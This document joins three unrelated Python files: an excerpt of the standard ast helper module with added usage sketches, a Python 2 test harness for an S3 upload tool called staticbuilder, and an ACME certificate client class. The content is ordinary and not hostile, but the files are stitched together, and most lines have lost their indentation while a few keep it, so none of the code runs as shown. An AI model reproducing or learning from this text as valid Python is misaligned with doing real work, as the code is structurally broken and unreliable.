def parse(source, filename='<unknown>', mode='exec'):
"""
Parse the source into an AST node.
Equivalent to compile(source, filename, mode, PyCF_ONLY_AST).
"""
return compile(source, filename, mode, PyCF_ONLY_AST)
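# Illustrative usage sketch (added; not part of the original module): parse()
# is just a thin wrapper around compile() with the PyCF_ONLY_AST flag.
def _parse_example():
    tree = parse("answer = 40 + 2")
    return tree  # a Module node whose body holds a single Assign statement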
def literal_eval(node_or_string):
"""
Safely evaluate an expression node or a string containing a Python
expression. The string or node provided may only consist of the following
Python literal structures: strings, numbers, tuples, lists, dicts, booleans,
and None.
"""
_safe_names = {'None': None, 'True': True, 'False': False}
if isinstance(node_or_string, str):
node_or_string = parse(node_or_string, mode='eval')
if isinstance(node_or_string, Expression):
node_or_string = node_or_string.body
def _convert(node):
if isinstance(node, (Str, Bytes)):
return node.s
elif isinstance(node, Num):
return node.n
elif isinstance(node, Tuple):
return tuple(map(_convert, node.elts))
elif isinstance(node, List):
return list(map(_convert, node.elts))
elif isinstance(node, Set):
return set(map(_convert, node.elts))
elif isinstance(node, Dict):
return dict((_convert(k), _convert(v)) for k, v
in zip(node.keys, node.values))
elif isinstance(node, Name):
if node.id in _safe_names:
return _safe_names[node.id]
elif isinstance(node, UnaryOp) and \
isinstance(node.op, (UAdd, USub)) and \
isinstance(node.operand, (Num, UnaryOp, BinOp)):
operand = _convert(node.operand)
if isinstance(node.op, UAdd):
return + operand
else:
return - operand
elif isinstance(node, BinOp) and \
isinstance(node.op, (Add, Sub)) and \
isinstance(node.right, (Num, UnaryOp, BinOp)) and \
isinstance(node.left, (Num, UnaryOp, BinOp)):
left = _convert(node.left)
right = _convert(node.right)
if isinstance(node.op, Add):
return left + right
else:
return left - right
raise ValueError('malformed node or string: ' + repr(node))
return _convert(node_or_string)
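# Illustrative usage sketch (added; not part of the original module):
# literal_eval() only accepts literal structures, so arbitrary expressions
# such as function calls raise ValueError.
def _literal_eval_example():
    value = literal_eval("{'a': (1, -2.5), 'b': [True, None]}")
    assert value == {'a': (1, -2.5), 'b': [True, None]}
    try:
        literal_eval("__import__('os').getcwd()")
    except ValueError:
        pass  # non-literal nodes are rejected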
def dump(node, annotate_fields=True, include_attributes=False):
"""
Return a formatted dump of the tree in *node*. This is mainly useful for
debugging purposes. The returned string will show the names and the values
for fields. This makes the code impossible to evaluate, so if evaluation is
wanted *annotate_fields* must be set to False. Attributes such as line
numbers and column offsets are not dumped by default. If this is wanted,
*include_attributes* can be set to True.
"""
def _format(node):
if isinstance(node, AST):
fields = [(a, _format(b)) for a, b in iter_fields(node)]
rv = '%s(%s' % (node.__class__.__name__, ', '.join(
('%s=%s' % field for field in fields)
if annotate_fields else
(b for a, b in fields)
))
if include_attributes and node._attributes:
rv += fields and ', ' or ' '
rv += ', '.join('%s=%s' % (a, _format(getattr(node, a)))
for a in node._attributes)
return rv + ')'
elif isinstance(node, list):
return '[%s]' % ', '.join(_format(x) for x in node)
return repr(node)
if not isinstance(node, AST):
raise TypeError('expected AST, got %r' % node.__class__.__name__)
return _format(node)
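# Illustrative usage sketch (added; not part of the original module): the
# annotated form names every field, while annotate_fields=False is terser but
# can no longer be read back as constructor calls.
def _dump_example():
    tree = parse("x = 1")
    return dump(tree), dump(tree, annotate_fields=False)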
def copy_location(new_node, old_node):
"""
Copy source location (`lineno` and `col_offset` attributes) from
*old_node* to *new_node* if possible, and return *new_node*.
"""
for attr in 'lineno', 'col_offset':
if attr in old_node._attributes and attr in new_node._attributes \
and hasattr(old_node, attr):
setattr(new_node, attr, getattr(old_node, attr))
return new_node
def fix_missing_locations(node):
"""
When you compile a node tree with compile(), the compiler expects lineno and
col_offset attributes for every node that supports them. This is rather
tedious to fill in for generated nodes, so this helper adds these attributes
recursively where not already set, by setting them to the values of the
parent node. It works recursively starting at *node*.
"""
def _fix(node, lineno, col_offset):
if 'lineno' in node._attributes:
if not hasattr(node, 'lineno'):
node.lineno = lineno
else:
lineno = node.lineno
if 'col_offset' in node._attributes:
if not hasattr(node, 'col_offset'):
node.col_offset = col_offset
else:
col_offset = node.col_offset
for child in iter_child_nodes(node):
_fix(child, lineno, col_offset)
_fix(node, 1, 0)
return node
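# Illustrative usage sketch (added; not part of the original module): nodes
# built by hand have no lineno/col_offset, which compile() requires, so they
# are filled in from the parent node before compiling.
def _fix_missing_locations_example():
    tree = parse("result = []")
    tree.body.append(Expr(value=Num(n=0)))  # synthetic node without locations
    return compile(fix_missing_locations(tree), '<generated>', 'exec')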
def increment_lineno(node, n=1):
"""
Increment the line number of each node in the tree starting at *node* by *n*.
This is useful to "move code" to a different location in a file.
"""
for child in walk(node):
if 'lineno' in child._attributes:
child.lineno = getattr(child, 'lineno', 0) + n
return node
def iter_fields(node):
"""
Yield a tuple of ``(fieldname, value)`` for each field in ``node._fields``
that is present on *node*.
"""
for field in node._fields:
try:
yield field, getattr(node, field)
except AttributeError:
pass
def iter_child_nodes(node):
"""
Yield all direct child nodes of *node*, that is, all fields that are nodes
and all items of fields that are lists of nodes.
"""
for name, field in iter_fields(node):
if isinstance(field, AST):
yield field
elif isinstance(field, list):
for item in field:
if isinstance(item, AST):
yield item
def get_docstring(node, clean=True):
"""
Return the docstring for the given node or None if no docstring can
be found. If the node provided does not have docstrings a TypeError
will be raised.
"""
if not isinstance(node, (FunctionDef, ClassDef, Module)):
raise TypeError("%r can't have docstrings" % node.__class__.__name__)
if node.body and isinstance(node.body[0], Expr) and \
isinstance(node.body[0].value, Str):
if clean:
import inspect
return inspect.cleandoc(node.body[0].value.s)
return node.body[0].value.s
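# Illustrative usage sketch (added; not part of the original module): the
# module has a docstring, the function below does not.
def _get_docstring_example():
    module = parse('"""Module docstring."""\ndef f():\n    pass\n')
    return get_docstring(module), get_docstring(module.body[1])  # doc, None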
def walk(node):
"""
Recursively yield all descendant nodes in the tree starting at *node*
(including *node* itself), in no specified order. This is useful if you
only want to modify nodes in place and don't care about the context.
"""
from collections import deque
todo = deque([node])
while todo:
node = todo.popleft()
todo.extend(iter_child_nodes(node))
yield node
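# Illustrative usage sketch (added; not part of the original module): walk()
# flattens the whole tree, which is handy for simple counting or searching.
def _walk_example():
    tree = parse("def f(a, b):\n    return a + b\n")
    return sum(1 for node in walk(tree) if isinstance(node, Name))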
class NodeVisitor(object):
"""
A node visitor base class that walks the abstract syntax tree and calls a
visitor function for every node found. This function may return a value
which is forwarded by the `visit` method.
This class is meant to be subclassed, with the subclass adding visitor
methods.
Per default the visitor functions for the nodes are ``'visit_'`` +
class name of the node. So a `TryFinally` node visit function would
be `visit_TryFinally`. This behavior can be changed by overriding
the `visit` method. If no visitor function exists for a node
(return value `None`) the `generic_visit` visitor is used instead.
Don't use the `NodeVisitor` if you want to apply changes to nodes during
traversing. For this a special visitor exists (`NodeTransformer`) that
allows modifications.
"""
def visit(self, node):
"""Visit a node."""
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
return visitor(node)
def generic_visit(self, node):
"""Called if no explicit visitor function exists for a node."""
for field, value in iter_fields(node):
if isinstance(value, list):
for item in value:
if isinstance(item, AST):
self.visit(item)
elif isinstance(value, AST):
self.visit(value)
class NodeTransformer(NodeVisitor):
"""
A :class:`NodeVisitor` subclass that walks the abstract syntax tree and
allows modification of nodes.
The `NodeTransformer` will walk the AST and use the return value of the
visitor methods to replace or remove the old node. If the return value of
the visitor method is ``None``, the node will be removed from its location,
otherwise it is replaced with the return value. The return value may be the
original node in which case no replacement takes place.
Here is an example transformer that rewrites all occurrences of name lookups
(``foo``) to ``data['foo']``::
class RewriteName(NodeTransformer):
def visit_Name(self, node):
return copy_location(Subscript(
value=Name(id='data', ctx=Load()),
slice=Index(value=Str(s=node.id)),
ctx=node.ctx
), node)
Keep in mind that if the node you're operating on has child nodes you must
either transform the child nodes yourself or call the :meth:`generic_visit`
method for the node first.
For nodes that were part of a collection of statements (that applies to all
statement nodes), the visitor may also return a list of nodes rather than
just a single node.
Usually you use the transformer like this::
node = YourTransformer().visit(node)
"""
def generic_visit(self, node):
for field, old_value in iter_fields(node):
old_value = getattr(node, field, None)
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, AST):
value = self.visit(value)
if value is None:
continue
elif not isinstance(value, AST):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, AST):
new_node = self.visit(old_value)
if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
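# Illustrative usage sketch (added; not part of the original module): applying
# the RewriteName transformer from the NodeTransformer docstring above and
# compiling the rewritten tree.
def _node_transformer_example():
    class RewriteName(NodeTransformer):
        def visit_Name(self, node):
            return copy_location(Subscript(
                value=Name(id='data', ctx=Load()),
                slice=Index(value=Str(s=node.id)),
                ctx=node.ctx), node)
    tree = RewriteName().visit(parse("foo + bar", mode='eval'))
    code = compile(fix_missing_locations(tree), '<rewritten>', 'eval')
    return eval(code, {'data': {'foo': 1, 'bar': 2}})  # -> 3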
|
|
#!/usr/bin/env python
import os
import subprocess
from staticbuilder import StaticBuilder
def test():
"""
Test harness for static builder.
Checks SB both as imported object and command line utility.
Test paths must be set up correctly:
(TODO: create setup function to automate directory/file creation)
"""
command_line_test = True
object_test = True
# TEST COMMAND LINE
if command_line_test:
print "Testing SB from the command line"
# Test bad local path.
print "Testing bad local path"
cmd = "python staticbuilder.py \
~/projects/staticbuilder/sb_test_bucket/no_file.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test invalid location.
print "Testing invalid location"
cmd = "python staticbuilder.py \
-p invalid_location \
~/projects/staticbuilder/sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test that an absolute file path in works.
print "Testing single in path, absolute."
cmd = "python staticbuilder.py \
/Users/scottyoung/projects/staticbuilder/sb_test_bucket/testfile0.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that a relative file path in works.
print "Testing single in path, relative."
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testfile1.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that out path works.
print "Testing out path."
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testfile1.txt sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that two in-paths work.
print "Testing two in paths."
cmd = "python staticbuilder.py \
sb_test_bucket/testfile2in1.txt \
sb_test_bucket/testfile2in2.txt \
sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that three in-paths work - no more after this!.
print "Testing three in paths."
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testfile3in1.txt \
sb_test_bucket/testdir1/testfile3in2.txt \
sb_test_bucket/testfile3in3.txt \
sb_test_bucket/testdir1/"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test for a single directory in
print "Testing single directory in - no recursion"
cmd = "python staticbuilder.py \
sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test for a single sub directory recursive
print "Testing single directory in - with recursion"
cmd = "python staticbuilder.py -r \
sb_test_bucket/testdir1"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test a directory with out path - not recursive
print "Testing directory - no recursion"
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testdir2 \
sb_test_bucket/testdir1/testdir2"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test a directory with out path - recursive
print "Testing directory - with recursion"
cmd = "python staticbuilder.py -r \
sb_test_bucket/testdir1/testdir2 \
sb_test_bucket/testdir1/testdir2"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test deletion of a file
print "Testing deletion of a file"
cmd = "python staticbuilder.py -f \
-d sb_test_bucket/testfile0.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test deletion of a directory
print "Testing deletion of a file"
cmd = "python staticbuilder.py -f -r \
-d sb_test_bucket/testdir1"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test no arguments - should upload cwd
print "Testing no arguments - no recursion"
os.chdir("sb_test_bucket")
cmd = "python ../staticbuilder.py"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test no arguments with recursion
print "Testing no arguments - with recursion"
cmd = "python ../staticbuilder.py -R"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test list bad bucket name
print "Testing option -l buckets with bad bucket name"
os.chdir("..")
cmd = "python staticbuilder.py -l no_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test that SB can list all buckets
print "Testing option -l buckets (list buckets)"
cmd = "python staticbuilder.py -l buckets"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that SB can list all keys in a bucket
print "Testing option -l sb_test_bucket (list all keys in bucket)"
cmd = "python staticbuilder.py -l sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that SB can list filtered keys
print "Testing option -l sb_test_bucket/testdir1 (list all keys in directory)"
cmd = "python staticbuilder.py -l sb_test_bucket/testdir1"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test rename with too few arguments errors
print "Testing option -n with 0 args"
cmd = "python staticbuilder.py -n new_name.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test rename with too many arguments errors
print "Testing option -n with 3 args"
cmd = "python staticbuilder.py -N new_name.text file1.txt file2.txt path/out "
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test rename
print "Testing option -n (rename)"
cmd = "python staticbuilder.py --name new_name.txt sb_test_bucket/testfile0.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test metadata
print "Testing option -m (metadata)"
cmd = "python staticbuilder.py -m kick:ass sb_test_bucket/metadata.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test acl
print "Testing option -a (acl)"
cmd = "python staticbuilder.py -a public-read sb_test_bucket/public.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
print "Complete SB test from command line."
##########################################
if object_test:
# TEST OBJECT
print "Testing SB as an object"
options = None
sb = StaticBuilder(options)
# Test bad local path.
print "Testing bad local path"
try:
sb.upload("~/projects/staticbuilder/st_test_bucket/file0.txt")
except SystemExit, e:
print e.code
assert e.code == 2
except Exception, e:
print "Unexpected Exception with bad local path."
else:
print "No exception raised with bad local path"
#sb = StaticBuilder(options)
# Test that an absolute file path in works.
print "Testing single in path, absolute."
sb.upload("/Users/scottyoung/projects/staticbuilder/sb_test_bucket/testfile0.txt")
# Test that a relative file path in works.
print "Testing single in path, relative."
sb.upload("sb_test_bucket/testdir1/testfile1.txt")
# Test that out path works.
print "Testing out path."
sb.upload("sb_test_bucket/testdir1/testfile1.txt", "sb_test_bucket")
# Test that two in-paths work.
print "Testing two in paths."
paths_in = ["sb_test_bucket/testfile2in1.txt", "sb_test_bucket/testfile2in2.txt"]
sb.upload(paths_in, "sb_test_bucket")
# Test that three in-paths work - no more after this!.
print "Testing three in paths."
paths_in = ["sb_test_bucket/testdir1/testfile3in1.txt", "sb_test_bucket/testdir1/testfile3in2.txt",
"sb_test_bucket/testfile3in3.txt"]
sb.upload(paths_in, "sb_test_bucket/testdir1/")
# Test for a single directory in
print "Testing single directory in - no recursion"
sb.upload("sb_test_bucket")
# Test for a single sub directory recursive
print "Testing single directory in - with recursion"
sb.upload("sb_test_bucket/testdir1", recursive=True)
# Test a directory with out_path - not recursive
print "Testing directory - no recursion"
sb.upload("sb_test_bucket/testdir1/testdir2", "sb_test_bucket/testdir1/testdir2")
# Test a directory with out_path - recursive
print "Testing directory - with recursion"
sb.upload("sb_test_bucket/testdir1/testdir2", "sb_test_bucket/testdir1/testdir2", recursive=True)
# Test deletion of a file
print "Testing deletion of a file"
sb.delete("sb_test_bucket/testfile0.txt", force=True)
# Test deletion of a directory
print "Testing deletion of a file"
sb.delete("sb_test_bucket/testdir1", force=True, recursive=True)
# Test no arguments - should upload cwd
print "Testing no arguments - no recursion"
os.chdir("sb_test_bucket")
sb.upload()
# Test no arguments with recursion
print "Testing no arguments - with recursion"
sb.upload(recursive=True)
        # Return to the project root before the listing tests
        os.chdir("..")
# Test that SB can list all buckets
print "Testing listBuckets"
sb.listBuckets()
# Test that SB can list all keys in a bucket
print "Testing option -l sb_test_bucket (list all keys in bucket)"
sb.listKeys("sb_test_bucket")
# Test that SB can list filtered keys
print "Testing option -l sb_test_bucket/testdir1 (list all keys in directory)"
sb.listKeys("sb_test_bucket/testdir1")
# Test rename with too few arguments errors
print "Testing name with too few args"
try:
sb.upload(name="new_name.txt")
except SystemExit, e:
assert e.code == 2
except Exception, e:
print "Unexpected Exception with 1 arg for name."
else:
print "No exception raised with 1 arg for name"
# Test rename with too many arguments errors
print "Testing name with too many args"
paths_in = ["sb_test_bucket/testfile2in1.txt", "sb_test_bucket/testfile2in2.txt"]
try:
sb.upload(paths_in=paths_in, name="new_name.txt")
except SystemExit, e:
assert e.code == 2
except Exception, e:
print "Unexpected Exception with 3 args for name."
else:
print "No exception raised with 3 args for name"
# Test rename
print "Testing option name"
sb.upload("sb_test_bucket/testfile0.txt", name="new_name.txt")
# Test metadata
print "Testing option -m (metadata)"
meta = {'kick':'ass'}
sb.upload("sb_test_bucket/metadata.txt", metadata=meta)
# Test acl
print "Testing option -a (acl)"
sb.set_acl("sb_test_bucket/public.txt", "public-read")
print "Complete SB object test."
if __name__ == "__main__":
test()
|
|
"""ACME client API."""
import datetime
import heapq
import logging
import time
import six
from six.moves import http_client # pylint: disable=import-error
import OpenSSL
import requests
import sys
import werkzeug
from acme import errors
from acme import jose
from acme import jws
from acme import messages
logger = logging.getLogger(__name__)
# Prior to Python 2.7.9 the stdlib SSL module did not allow a user to configure
# many important security related options. On these platforms we use PyOpenSSL
# for SSL, which does allow these options to be configured.
# https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning
if sys.version_info < (2, 7, 9): # pragma: no cover
requests.packages.urllib3.contrib.pyopenssl.inject_into_urllib3()
class Client(object): # pylint: disable=too-many-instance-attributes
"""ACME client.
.. todo::
Clean up raised error types hierarchy, document, and handle (wrap)
instances of `.DeserializationError` raised in `from_json()`.
:ivar messages.Directory directory:
:ivar key: `.JWK` (private)
:ivar alg: `.JWASignature`
:ivar bool verify_ssl: Verify SSL certificates?
:ivar .ClientNetwork net: Client network. Useful for testing. If not
supplied, it will be initialized using `key`, `alg` and
`verify_ssl`.
"""
DER_CONTENT_TYPE = 'application/pkix-cert'
def __init__(self, directory, key, alg=jose.RS256, verify_ssl=True,
net=None):
"""Initialize.
:param directory: Directory Resource (`.messages.Directory`) or
URI from which the resource will be downloaded.
"""
self.key = key
self.net = ClientNetwork(key, alg, verify_ssl) if net is None else net
if isinstance(directory, six.string_types):
self.directory = messages.Directory.from_json(
self.net.get(directory).json())
else:
self.directory = directory
@classmethod
def _regr_from_response(cls, response, uri=None, new_authzr_uri=None,
terms_of_service=None):
terms_of_service = (
response.links['terms-of-service']['url']
if 'terms-of-service' in response.links else terms_of_service)
if new_authzr_uri is None:
try:
new_authzr_uri = response.links['next']['url']
except KeyError:
raise errors.ClientError('"next" link missing')
return messages.RegistrationResource(
body=messages.Registration.from_json(response.json()),
uri=response.headers.get('Location', uri),
new_authzr_uri=new_authzr_uri,
terms_of_service=terms_of_service)
def register(self, new_reg=None):
"""Register.
:param .NewRegistration new_reg:
:returns: Registration Resource.
:rtype: `.RegistrationResource`
:raises .UnexpectedUpdate:
"""
new_reg = messages.NewRegistration() if new_reg is None else new_reg
assert isinstance(new_reg, messages.NewRegistration)
response = self.net.post(self.directory[new_reg], new_reg)
# TODO: handle errors
assert response.status_code == http_client.CREATED
# "Instance of 'Field' has no key/contact member" bug:
# pylint: disable=no-member
regr = self._regr_from_response(response)
if (regr.body.key != self.key.public_key() or
regr.body.contact != new_reg.contact):
raise errors.UnexpectedUpdate(regr)
return regr
def _send_recv_regr(self, regr, body):
response = self.net.post(regr.uri, body)
# TODO: Boulder returns httplib.ACCEPTED
#assert response.status_code == httplib.OK
# TODO: Boulder does not set Location or Link on update
# (c.f. acme-spec #94)
return self._regr_from_response(
response, uri=regr.uri, new_authzr_uri=regr.new_authzr_uri,
terms_of_service=regr.terms_of_service)
def update_registration(self, regr, update=None):
"""Update registration.
:param messages.RegistrationResource regr: Registration Resource.
:param messages.Registration update: Updated body of the
resource. If not provided, body will be taken from `regr`.
:returns: Updated Registration Resource.
:rtype: `.RegistrationResource`
"""
update = regr.body if update is None else update
updated_regr = self._send_recv_regr(
regr, body=messages.UpdateRegistration(**dict(update)))
if updated_regr != regr:
raise errors.UnexpectedUpdate(regr)
return updated_regr
def query_registration(self, regr):
"""Query server about registration.
        :param messages.RegistrationResource regr: Existing Registration
Resource.
"""
return self._send_recv_regr(regr, messages.UpdateRegistration())
def agree_to_tos(self, regr):
"""Agree to the terms-of-service.
Agree to the terms-of-service in a Registration Resource.
:param regr: Registration Resource.
:type regr: `.RegistrationResource`
:returns: Updated Registration Resource.
:rtype: `.RegistrationResource`
"""
return self.update_registration(
regr.update(body=regr.body.update(agreement=regr.terms_of_service)))
def _authzr_from_response(self, response, identifier,
uri=None, new_cert_uri=None):
# pylint: disable=no-self-use
if new_cert_uri is None:
try:
new_cert_uri = response.links['next']['url']
except KeyError:
raise errors.ClientError('"next" link missing')
authzr = messages.AuthorizationResource(
body=messages.Authorization.from_json(response.json()),
uri=response.headers.get('Location', uri),
new_cert_uri=new_cert_uri)
if authzr.body.identifier != identifier:
raise errors.UnexpectedUpdate(authzr)
return authzr
def request_challenges(self, identifier, new_authzr_uri):
"""Request challenges.
:param identifier: Identifier to be challenged.
:type identifier: `.messages.Identifier`
:param str new_authzr_uri: new-authorization URI
:returns: Authorization Resource.
:rtype: `.AuthorizationResource`
"""
new_authz = messages.NewAuthorization(identifier=identifier)
response = self.net.post(new_authzr_uri, new_authz)
# TODO: handle errors
assert response.status_code == http_client.CREATED
return self._authzr_from_response(response, identifier)
def request_domain_challenges(self, domain, new_authz_uri):
"""Request challenges for domain names.
This is simply a convenience function that wraps around
`request_challenges`, but works with domain names instead of
generic identifiers.
:param str domain: Domain name to be challenged.
        :param str new_authz_uri: new-authorization URI
:returns: Authorization Resource.
:rtype: `.AuthorizationResource`
"""
return self.request_challenges(messages.Identifier(
typ=messages.IDENTIFIER_FQDN, value=domain), new_authz_uri)
def answer_challenge(self, challb, response):
"""Answer challenge.
:param challb: Challenge Resource body.
:type challb: `.ChallengeBody`
:param response: Corresponding Challenge response
:type response: `.challenges.ChallengeResponse`
:returns: Challenge Resource with updated body.
:rtype: `.ChallengeResource`
:raises .UnexpectedUpdate:
"""
response = self.net.post(challb.uri, response)
try:
authzr_uri = response.links['up']['url']
except KeyError:
raise errors.ClientError('"up" Link header missing')
challr = messages.ChallengeResource(
authzr_uri=authzr_uri,
body=messages.ChallengeBody.from_json(response.json()))
# TODO: check that challr.uri == response.headers['Location']?
if challr.uri != challb.uri:
raise errors.UnexpectedUpdate(challr.uri)
return challr
@classmethod
def retry_after(cls, response, default):
"""Compute next `poll` time based on response ``Retry-After`` header.
:param requests.Response response: Response from `poll`.
:param int default: Default value (in seconds), used when
``Retry-After`` header is not present or invalid.
:returns: Time point when next `poll` should be performed.
:rtype: `datetime.datetime`
"""
retry_after = response.headers.get('Retry-After', str(default))
try:
seconds = int(retry_after)
except ValueError:
# pylint: disable=no-member
decoded = werkzeug.parse_date(retry_after) # RFC1123
if decoded is None:
seconds = default
else:
return decoded
return datetime.datetime.now() + datetime.timedelta(seconds=seconds)
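    # Worked sketch (added note, not in the original): with default=5 a response
    # carrying "Retry-After: 60" yields now() + 60s, "Retry-After: Fri, 31 Dec
    # 1999 23:59:59 GMT" comes back as that parsed RFC1123 date, and a missing
    # or unparseable header falls back to now() + 5s.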
def poll(self, authzr):
"""Poll Authorization Resource for status.
:param authzr: Authorization Resource
:type authzr: `.AuthorizationResource`
:returns: Updated Authorization Resource and HTTP response.
:rtype: (`.AuthorizationResource`, `requests.Response`)
"""
response = self.net.get(authzr.uri)
updated_authzr = self._authzr_from_response(
response, authzr.body.identifier, authzr.uri, authzr.new_cert_uri)
# TODO: check and raise UnexpectedUpdate
return updated_authzr, response
def request_issuance(self, csr, authzrs):
"""Request issuance.
:param csr: CSR
:type csr: `OpenSSL.crypto.X509Req` wrapped in `.ComparableX509`
:param authzrs: `list` of `.AuthorizationResource`
:returns: Issued certificate
:rtype: `.messages.CertificateResource`
"""
assert authzrs, "Authorizations list is empty"
logger.debug("Requesting issuance...")
# TODO: assert len(authzrs) == number of SANs
req = messages.CertificateRequest(csr=csr)
        content_type = self.DER_CONTENT_TYPE  # TODO: add 'cert_type' argument
response = self.net.post(
authzrs[0].new_cert_uri, # TODO: acme-spec #90
req,
content_type=content_type,
headers={'Accept': content_type})
cert_chain_uri = response.links.get('up', {}).get('url')
try:
uri = response.headers['Location']
except KeyError:
raise errors.ClientError('"Location" Header missing')
return messages.CertificateResource(
uri=uri, authzrs=authzrs, cert_chain_uri=cert_chain_uri,
body=jose.ComparableX509(OpenSSL.crypto.load_certificate(
OpenSSL.crypto.FILETYPE_ASN1, response.content)))
def poll_and_request_issuance(
self, csr, authzrs, mintime=5, max_attempts=10):
"""Poll and request issuance.
This function polls all provided Authorization Resource URIs
until all challenges are valid, respecting ``Retry-After`` HTTP
headers, and then calls `request_issuance`.
:param .ComparableX509 csr: CSR (`OpenSSL.crypto.X509Req`
wrapped in `.ComparableX509`)
:param authzrs: `list` of `.AuthorizationResource`
:param int mintime: Minimum time before next attempt, used if
``Retry-After`` is not present in the response.
:param int max_attempts: Maximum number of attempts before
`PollError` with non-empty ``waiting`` is raised.
:returns: ``(cert, updated_authzrs)`` `tuple` where ``cert`` is
the issued certificate (`.messages.CertificateResource`),
and ``updated_authzrs`` is a `tuple` consisting of updated
Authorization Resources (`.AuthorizationResource`) as
present in the responses from server, and in the same order
as the input ``authzrs``.
:rtype: `tuple`
:raises PollError: in case of timeout or if some authorization
was marked by the CA as invalid
"""
# priority queue with datetime (based on Retry-After) as key,
# and original Authorization Resource as value
waiting = [(datetime.datetime.now(), authzr) for authzr in authzrs]
# mapping between original Authorization Resource and the most
# recently updated one
updated = dict((authzr, authzr) for authzr in authzrs)
while waiting and max_attempts:
max_attempts -= 1
# find the smallest Retry-After, and sleep if necessary
when, authzr = heapq.heappop(waiting)
now = datetime.datetime.now()
if when > now:
seconds = (when - now).seconds
logger.debug('Sleeping for %d seconds', seconds)
time.sleep(seconds)
# Note that we poll with the latest updated Authorization
# URI, which might have a different URI than initial one
updated_authzr, response = self.poll(updated[authzr])
updated[authzr] = updated_authzr
# pylint: disable=no-member
if updated_authzr.body.status not in (
messages.STATUS_VALID, messages.STATUS_INVALID):
# push back to the priority queue, with updated retry_after
heapq.heappush(waiting, (self.retry_after(
response, default=mintime), authzr))
if not max_attempts or any(authzr.body.status == messages.STATUS_INVALID
for authzr in six.itervalues(updated)):
raise errors.PollError(waiting, updated)
updated_authzrs = tuple(updated[authzr] for authzr in authzrs)
return self.request_issuance(csr, updated_authzrs), updated_authzrs
def _get_cert(self, uri):
"""Returns certificate from URI.
:param str uri: URI of certificate
:returns: tuple of the form
(response, :class:`acme.jose.ComparableX509`)
:rtype: tuple
"""
content_type = self.DER_CONTENT_TYPE # TODO: make it a param
response = self.net.get(uri, headers={'Accept': content_type},
content_type=content_type)
return response, jose.ComparableX509(OpenSSL.crypto.load_certificate(
OpenSSL.crypto.FILETYPE_ASN1, response.content))
def check_cert(self, certr):
"""Check for new cert.
:param certr: Certificate Resource
:type certr: `.CertificateResource`
:returns: Updated Certificate Resource.
:rtype: `.CertificateResource`
"""
# TODO: acme-spec 5.1 table action should be renamed to
# "refresh cert", and this method integrated with self.refresh
response, cert = self._get_cert(certr.uri)
if 'Location' not in response.headers:
raise errors.ClientError('Location header missing')
if response.headers['Location'] != certr.uri:
raise errors.UnexpectedUpdate(response.text)
return certr.update(body=cert)
def refresh(self, certr):
"""Refresh certificate.
:param certr: Certificate Resource
:type certr: `.CertificateResource`
:returns: Updated Certificate Resource.
:rtype: `.CertificateResource`
"""
# TODO: If a client sends a refresh request and the server is
# not willing to refresh the certificate, the server MUST
# respond with status code 403 (Forbidden)
return self.check_cert(certr)
def fetch_chain(self, certr, max_length=10):
"""Fetch chain for certificate.
:param .CertificateResource certr: Certificate Resource
:param int max_length: Maximum allowed length of the chain.
Note that each element in the certificate requires new
``HTTP GET`` request, and the length of the chain is
controlled by the ACME CA.
:raises errors.Error: if recursion exceeds `max_length`
:returns: Certificate chain for the Certificate Resource. It is
a list ordered so that the first element is a signer of the
certificate from Certificate Resource. Will be empty if
``cert_chain_uri`` is ``None``.
:rtype: `list` of `OpenSSL.crypto.X509` wrapped in `.ComparableX509`
"""
chain = []
uri = certr.cert_chain_uri
while uri is not None and len(chain) < max_length:
response, cert = self._get_cert(uri)
uri = response.links.get('up', {}).get('url')
chain.append(cert)
if uri is not None:
raise errors.Error(
"Recursion limit reached. Didn't get {0}".format(uri))
return chain
def revoke(self, cert):
"""Revoke certificate.
:param .ComparableX509 cert: `OpenSSL.crypto.X509` wrapped in
`.ComparableX509`
:raises .ClientError: If revocation is unsuccessful.
"""
response = self.net.post(self.directory[messages.Revocation],
messages.Revocation(certificate=cert),
content_type=None)
if response.status_code != http_client.OK:
raise errors.ClientError(
'Successful revocation must return HTTP OK status')
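# Illustrative end-to-end sketch (added; not part of the original module). The
# arguments are assumptions for demonstration only: an ACME directory URL or
# messages.Directory, an account key as an acme.jose JWK, a CSR wrapped in
# jose.ComparableX509, and a messages.Identifier for the domain.
def _example_issuance_flow(directory, account_key, csr, identifier):
    client = Client(directory, account_key)
    regr = client.agree_to_tos(client.register())
    authzr = client.request_challenges(identifier, regr.new_authzr_uri)
    # ... solve and answer_challenge() the returned challenges here ...
    certr, _ = client.poll_and_request_issuance(csr, [authzr])
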